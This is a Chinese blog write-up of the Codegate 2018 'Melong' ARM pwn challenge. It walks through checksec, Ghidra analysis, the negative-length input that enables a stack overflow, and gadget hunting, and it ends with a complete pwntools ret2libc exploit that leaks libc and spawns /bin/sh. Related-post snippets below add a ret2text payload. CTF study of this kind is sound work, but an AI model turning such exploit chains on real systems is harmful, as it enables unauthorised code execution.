ctf-wiki ARM ROP Codegate2018_Melong题解

最新推荐文章于 2024-04-24 22:53:20 发布
最新推荐文章于 2024-04-24 22:53:20 发布
阅读量436 收藏
点赞数
原文链接:https://www.jianshu.com/p/d1d2a2ceac64
版权

写在前面

ctf-wiki关于arm pwn的arm - ROP中的例题是Codegate2018_Melong,但在网上一直没找到write up,这里跟着官方解给出的exp调试记录。

确定保护

$ file ./melong
./melong: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=2c55e75a072020303e7c802d32a5b82432f329e9, not stripped
$ checksec ./melong
[*] '/home/giantbranch/ctf_wiki_study/ctf-challenges/pwn/arm/Codegate2018_Melong/melong'
    Arch:     arm-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x10000)

猜测是栈溢出题目,保护机制带随机部分随机化,Partial RELRO

静态分析

首先用命令$ qemu-arm -L ./ ./melong运行程序,程序结果如下图所示:
在这里插入图片描述

典型菜单题,运行之后发现首先需要选择菜单1,计算bmi指数,之后才能选择其他功能。经测试程序的大规模文本输入点在选项4中,但是需要选项3符合一定条件才行。

You are underweight !!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:3
Let's start personal training
How long do you want to take personal training?
10
Check your bmi again!!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
you should take personal training first!!

将程序拖到ghidra进行静态分析,查看主函数中case 3和case 4中的情况。
在这里插入图片描述

可以看到若想到达case 4中的write_diary函数,首先需要变量local_18[0]!=0才行。
注意到case 3中:local_18[0]=PT(),进一步查看函数PT()中的内容,伪代码如下图所示:

size_t PT(void)

{
  size_t local_14;
  void *local_10;
  int local_c;
  
  puts("Let\'s start personal training");
  puts("How long do you want to take personal training?");
  __isoc99_scanf(&DAT_00011e24,&local_14);
  local_10 = malloc(local_14);
  if (local_10 == exc2) {
    puts("Okay, start to exercise!");
    local_c = 0;
    while (local_c < (int)local_14) {
      puts("you are getting healthy..");
      sleep(1);
      local_c = local_c + 1;
    }
    free(local_10);
  }
  else {
    puts("Check your bmi again!!");
    free(local_10);
    local_14 = 0;
  }
  return local_14;
}

这里没明白local_10==exc2中的exc2是什么意思。但是经测试输入-1时,在菜单4中可以写入,猜测这里是可能的溢出点。

Type the number:3
Let's start personal training
How long do you want to take personal training?
-1
Okay, start to exercise!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
dddddddd
you wrote dddddddd

尝试输入长字符:

Type the number:4
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
you wrote ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:6
See you again :)
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault (core dumped)

进入gdb调试,开启两个termial
qemu-arm -L ./ -g 2222 ./melong

> gdb-multiarch ./melong
> target remote :2222

挂载调试程序崩溃时的场景,存在栈溢出。
评估栈溢出的长度,利用pwntools中的cyclic工具,偏移长度84

看到函数表中有puts函数,可以上pwn的传统工艺:
栈溢出==>puts(elf.got[‘function_name’])>计算libc基址>跳回main==>跳转到system("/bin/sh")

arm32利用gadget:pop {r0,pc}
利用ROPgadget寻找地址:

> ROPgadget --binary ./melong --only "pop"
Gadgets information
============================================================
0x000106bc : pop {fp, pc}
0x00011bbc : pop {r0, pc}
0x00010460 : pop {r3, pc}
0x000109cc : pop {r4, fp, pc}
0x000105e4 : pop {r4, pc}
0x00011408 : pop {r4, r5, pc}
0x0001173c : pop {r4, r5, r6, pc}
0x00011d28 : pop {r4, r5, r6, r7, r8, sb, sl, pc}

Unique gadgets found: 8

完成EXP如下所示:

from pwn import *
from time import sleep
import sys
context.binary = "./melong"

if sys.argv[1] == "r":
    io = remote("localhost", 9999)
elif sys.argv[1] == "l":
    io = process(["qemu-arm", "-L", "./", "./melong"])
elif sys.argv[1] == "g":
    io = process(["qemu-arm", "-g", "1239", "-L", "./", "./melong"])

elf = ELF("./melong", checksec = False)
libc = ELF("./lib/libc.so.6", checksec = False)
# context.log_level = "debug"

def check(height,weight):
    io.sendlineafter("number:","1")
    io.sendlineafter(" : ",str(height))
    io.sendlineafter(" : ",str(weight))
def register():
    io.sendlineafter("number:","3")
    io.sendlineafter(" training?\n","-1\n")

def write_record(record):
    io.sendlineafter("number:","4")
    io.send(record)
    

def log_out():
    io.sendlineafter("number:","6")

pop_r0 = 0x11bbc
check(1.82,600)
register()
payload=cyclic(100)
log_out()

payload=cyclic(84)+p32(pop_r0)+p32(elf.got['printf'])+p32(elf.plt['puts'])+p32(0x110cc)*8#
write_record(payload)
log_out()
io.recvuntil("again :)\n")
libc_address=u32(io.recvn(4))-libc.sym['printf']
success("libc_address->{:#x}".format(libc_address))
libc.address=libc_address
check(1.9,30)
register()
print("libc.search type is ",libc.search("/bin/sh"))
print(hex(libc.sym["system"]))
print(hex(next(libc.search("/bin/sh"))))
payload=cyclic(0x54)+p32(pop_r0)+p32(next(libc.search("/bin/sh")))+p32(libc.sym["system"])
write_record(payload)
log_out()
io.interactive()
flypwn
关注
ROPCTF-pwn 详解writeup;one_gadget使用;静态库;静态链接
CHERRY_cong的博客
05-01 1281
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序(ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1529
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
CTF Wiki 2017.12.27
01-20
CTF Wiki 2017.12.27 CTF Wiki 2017.12.27 CTF Wiki 2017.12.27
ARM PWN:Codegate2018_Melong详细讲解
hollk’s blog
07-04 913
前言 在上一篇文章中我们讲解了一道ARM32静态链接的题目,本篇文章讲解的是ARM32动态链接的题目:Codegate2018_Melong。其实本质并没有什么太大的区别,仅仅只是多了一个动态链接库而已,并不会有什么影响,基本的做题思路和以往的x86类题目保持一致 往期回顾: 通过一道ARM PWN题引发的思考:jarvisOJ_typo ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建 好好说话之House Of Einherjar (补题)HITCON 2018 PWN baby_
kernel简单学习(CTF-wiki)
njh18790816639的博客
10-31 1192
就从CTF WIKI的例题开始吧,此具有由易到难的特性,适合上手;
ctf-wikiCTF Wiki的新起点! 快来加入我们,我们需要您!
02-04
CTF维基 欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的不断发展, CTF挑战的难度越来越大。 结果,初学者的学习曲线越来越陡峭。 大多数在线信息是零散的和琐碎的。 初学者通常不知道如何系统地学习CTF ,这需要大量的工作和精力。 为了让对CTF感兴趣的人轻松入门,2016年10月,在Github上建立了CTF Wiki 。 随着时间的推移,随着内容的逐渐改进, CTF Wiki得到了安全爱好者的高度赞赏
ctf-wiki 基本ROP
农夫果园好好喝的博客
07-11 521
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 流程...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
ctf-wiki-en:流行的ctf-wiki的完整英文版
05-13
CTF维基 欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的发展, CTF挑战的难度越来越大。 结果,初学者的学习曲线越来越陡峭。 大多数在线信息是零散的和琐碎的。 初学者通常不知道如何系统地学习CTF ,这需要大量的工作和精力。 为了让对CTF感兴趣的人轻松入门,2016年10月,在Github上建立了CTF Wiki 。 随着时间的推移,随着内容的逐步改进, CTF Wiki得到了安全爱好者的广泛赞赏,其中许多人是我们认为我们永远不会见面的人。 作为一个自由站点,主要关注最新的CTFCTF Wiki引入了CTF各个方面的知识和技术,使初学者更容易学习CTF 。 现在,周大福主要维基包含了CTF
CTFWiki-pwn
qq_55233040的博客
05-03 1530
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
ctf wiki pwn(入门实操)
至臻求学,胸怀云月
01-11 2475
gets函数溢出 源码 #include <stdio.h> #include <string.h> void success() { puts("you are succeed!"); } void volunter() { char s[12]; gets(s); puts(s); re...
ctfwiki---基本ROP
xuqi7
11-29 2234
ctfwiki,基本ROP(Return Oriented Programming)复现
ctfwiki笔记--Linux堆基础
I have a dream
04-30 2738
参考链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_overview/#_5 1、Linux在内存分配与使用的过程中,核心思想是:只有当真正访问一个地址的时候,系统才会建立虚拟页面与物理页面的映射关系。所以虽然操作系统已经给程序分配了很大的内存空间,但是这块内存其实只是虚拟内存。只有当用户使用相应的内存时,系统才会真...
ctf-wiki基本ROP1-ret2text学习笔记
m0_58824086的博客
08-26 247
可以看出程序在主函数中使用了 gets 函数,显然存在栈溢出漏洞。这里计算出的偏移量。构造playload时,直接与系统调用地址相加就可。可以看出程序是 32 位程序,其仅仅开启了栈不可执行保护。然后,我们使用 IDA 来查看源代码。那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。在 please input 后,将之前生成的溢出字符串粘贴上去。注意:start 命令执行后,还需执行 contin 命令。,cyclic -l 地址 计算偏移量。
CTF wiki 栈基础部分学习总结
m0_57754423的博客
03-04 971
基本rop: ret2rext: 利用程序中已有的代码段。 main函数后一般跟都有leave ret; leave-> mov esp ebp;pop ebp; 函数返回值会保存在rax中; 32位程序传参是通过栈进行传参的,call一个函数的时候,此时esp所指向的位置是第一个参数,esp+4的位置是第二个参数,依次类推后跟下次函数的返回地址。 and 指令 :相同为1,不同为0。 ret2shellcode: 一般这种题目都会有rwx段,我们可以在该段内写入shellcode
ctf-wiki本地搭建记录
https://goodlunatic.github.io/
04-20 5212
ctf-wiki官网访问速度太慢了,而且时常会访问不了, 因此我决定将它直接搭建在本地。 一、先从github上下载压缩包到本地,并解压 二、在命令窗口中执行以下命令 Tips:我电脑的Python是用py运行的( •̀ ω •́ )y # 2. requirements pip install -r requirements.txt # generate static file in site/ py scripts/docs.py build-all # deploy at http://1
基于 CTF-wiki 的学习笔记 及实现 edb-debuger测试原理与脚本原理讲解版
QX_XDE的博客
04-24 1113
ctf-wiki学习笔记,pwn题目原理讲解
https://ctf-wiki.org/
最新发布
06-01
https://ctf-wiki.org/是一个关于CTF(夺旗赛)的详细介绍网站,内容包括CTF的基础知识、题目类型、工具使用、比赛平台等,是CTF爱好者必备的网站之一。以下是一个简单的介绍网站的例子: 根据https://ctf-wiki.org/网站,我们可以了解关于CTF的基本知识,比如各种题目类型,例如二进制、密码学、Web、逆向分析等等。此外,该网站还提供了一些CTF比赛的平台和工具的介绍,以及CTF比赛中需要掌握的一些技能和经验等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值